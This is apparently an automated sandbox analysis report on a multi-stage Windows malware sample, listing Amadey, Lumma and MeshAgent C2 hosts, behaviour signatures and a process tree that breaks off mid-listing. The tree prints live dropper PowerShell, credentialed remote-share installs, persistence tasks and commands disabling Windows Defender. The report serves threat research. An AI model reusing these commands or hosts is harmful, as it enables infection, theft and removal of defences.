Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 23:56

General

  • Target

    2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    cfe0e2ed11826a17b1d265a55fb70ba9

  • SHA1

    538627bfcde18a97ffcf81f8646ccec718b73f83

  • SHA256

    e0388c4c09e670a6b8b28f2edd5035425456828dbf0bd99fd21b3adccb927fd3

  • SHA512

    0bb7137db098cd950c71a724f86d1c7a4e0e9e1d66d60d4c2f9bcaa527a6b8e4bf8d551572a3f7349a36c75dc92448031655adf30ea5234013ed925fe67eea88

  • SSDEEP

    24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:oTvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://krxspint.digital/kendwz

https://jrxsafer.top/shpaoz

https://rhxhube.run/pogrs

https://ogrxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://iplpepperiop.digital/oage

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

Extracted

Family

meshagent

Version

2

Botnet

test123

C2

http://aaso12.duckdns.org:443/agent.ashx

Attributes
  • mesh_id

    0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C

  • server_id

    22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8

  • wss

    wss://aaso12.duckdns.org:443/agent.ashx

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects MeshAgent payload 1 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Modifies security service 2 TTPs 2 IoCs
  • Contacts a large (6666) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 20 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 39 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn SVRGMmawHkw /tr "mshta C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn SVRGMmawHkw /tr "mshta C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1860
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5944
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Users\Admin\AppData\Local\TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE
          "C:\Users\Admin\AppData\Local\TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3128
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2816
            • C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe
              "C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3528
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                  PID:4048
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5036
                  • C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe
                    "C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3784
                    • C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe
                      "C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe" h
                      9⤵
                      • Executes dropped EXE
                      PID:5432
                  • C:\Users\Admin\AppData\Roaming\kW3p2yUtCo.exe
                    "C:\Users\Admin\AppData\Roaming\kW3p2yUtCo.exe"
                    8⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5588
              • C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe
                "C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5584
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4868
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2712
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4884
                    • C:\Windows\SysWOW64\net.exe
                      net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:3408
                    • \??\UNC\aaso12.duckdns.org\shear\s.exe
                      \\aaso12.duckdns.org\shear\s -fullinstall
                      9⤵
                      • Sets service image path in registry
                      • Drops file in Program Files directory
                      PID:1396
              • C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe
                "C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4796
                • C:\Users\Admin\AppData\Local\Temp\272.exe
                  "C:\Users\Admin\AppData\Local\Temp\272.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:652
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE2C.tmp\BE2D.tmp\BE2E.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5080
                    • C:\Users\Admin\AppData\Local\Temp\272.exe
                      "C:\Users\Admin\AppData\Local\Temp\272.exe" go
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:3524
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BFE1.tmp\BFE2.tmp\BFE3.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
                        10⤵
                        • Drops file in Program Files directory
                        PID:2944
                        • C:\Windows\system32\sc.exe
                          sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                          11⤵
                          • Launches sc.exe
                          PID:4556
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:4592
                        • C:\Windows\system32\timeout.exe
                          timeout /t 1
                          11⤵
                          • Delays execution with timeout.exe
                          PID:4452
                        • C:\Windows\system32\sc.exe
                          sc stop ddrver
                          11⤵
                          • Launches sc.exe
                          PID:1472
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:592
                        • C:\Windows\system32\takeown.exe
                          takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:3928
                        • C:\Windows\system32\icacls.exe
                          icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:544
                        • C:\Windows\system32\sc.exe
                          sc stop "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:5692
                        • C:\Windows\system32\sc.exe
                          sc delete "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:5720
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                          11⤵
                            PID:2064
                          • C:\Windows\system32\sc.exe
                            sc stop "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:412
                          • C:\Windows\system32\sc.exe
                            sc delete "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:1916
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                            11⤵
                              PID:864
                            • C:\Windows\system32\sc.exe
                              sc stop "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:4740
                            • C:\Windows\system32\sc.exe
                              sc delete "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:5608
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                              11⤵
                                PID:4128
                              • C:\Windows\system32\sc.exe
                                sc stop "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:4960
                              • C:\Windows\system32\sc.exe
                                sc delete "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:932
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                11⤵
                                  PID:324
                                • C:\Windows\system32\sc.exe
                                  sc stop "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4700
                                • C:\Windows\system32\sc.exe
                                  sc delete "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1980
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                  11⤵
                                  • Modifies security service
                                  PID:3840
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5092
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5236
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  11⤵
                                    PID:5108
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2668
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5072
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    11⤵
                                      PID:2948
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4544
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4532
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      11⤵
                                        PID:2232
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4636
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2208
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        11⤵
                                          PID:1988
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:4404
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:4272
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          11⤵
                                            PID:4568
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:5304
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:3000
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            11⤵
                                              PID:5680
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:6064
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:5424
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              11⤵
                                                PID:4908
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:3844
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1736
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                11⤵
                                                  PID:4940
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5812
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5800
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  11⤵
                                                    PID:1936
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5788
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2936
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    11⤵
                                                      PID:3416
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:512
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:6096
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      11⤵
                                                        PID:1156
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        11⤵
                                                          PID:5568
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          11⤵
                                                            PID:4952
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            11⤵
                                                              PID:5848
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              11⤵
                                                                PID:2840
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:2056
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:3284
                                                    • C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe"
                                                      6⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6140
                                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5036
                                                        • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:3672
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            9⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:6032
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                              10⤵
                                                              • Uses browser remote debugging
                                                              • Enumerates system info in registry
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4892
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd5247dcf8,0x7ffd5247dd04,0x7ffd5247dd10
                                                                11⤵
                                                                  PID:3968
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1960 /prefetch:2
                                                                  11⤵
                                                                    PID:2768
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2240,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2244 /prefetch:3
                                                                    11⤵
                                                                      PID:2832
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2560 /prefetch:8
                                                                      11⤵
                                                                        PID:3128
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3256 /prefetch:1
                                                                        11⤵
                                                                        • Uses browser remote debugging
                                                                        PID:1552
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3292 /prefetch:1
                                                                        11⤵
                                                                        • Uses browser remote debugging
                                                                        PID:652
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4036,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4100 /prefetch:2
                                                                        11⤵
                                                                        • Uses browser remote debugging
                                                                        PID:5456
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4692 /prefetch:1
                                                                        11⤵
                                                                        • Uses browser remote debugging
                                                                        PID:1980
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,2178912440469454301,12155481498110078115,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5192 /prefetch:8
                                                                        11⤵
                                                                          PID:4960
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
